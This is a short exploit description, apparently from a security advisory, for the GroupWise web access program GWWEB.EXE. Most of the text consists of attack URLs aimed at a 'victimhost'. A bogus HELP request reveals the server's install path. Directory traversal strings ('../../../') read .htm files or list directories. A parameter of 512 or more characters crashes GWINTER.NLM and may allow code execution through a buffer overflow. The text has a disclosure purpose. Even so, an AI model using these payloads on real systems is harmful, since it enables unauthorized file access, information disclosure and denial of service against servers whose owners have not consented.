Exploit: Requesting the following URL from the GroupWise server http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=asdf will return the error message: Could not read file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\ASDF.HTM revealing the full path of the GroupWise server software. Note: The URL above may need to be tailored to the target system. To read .htm files anywhere on the server, or to browse directories, use HELP and the ../ string to traverse directories, for example: http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm or http ://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../ Again, the paths shown above may need to be modified. To abend GWINTER.NLM request a URL like: http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars] It may be possible to remotely execute arbitrary code via this buffer overflow.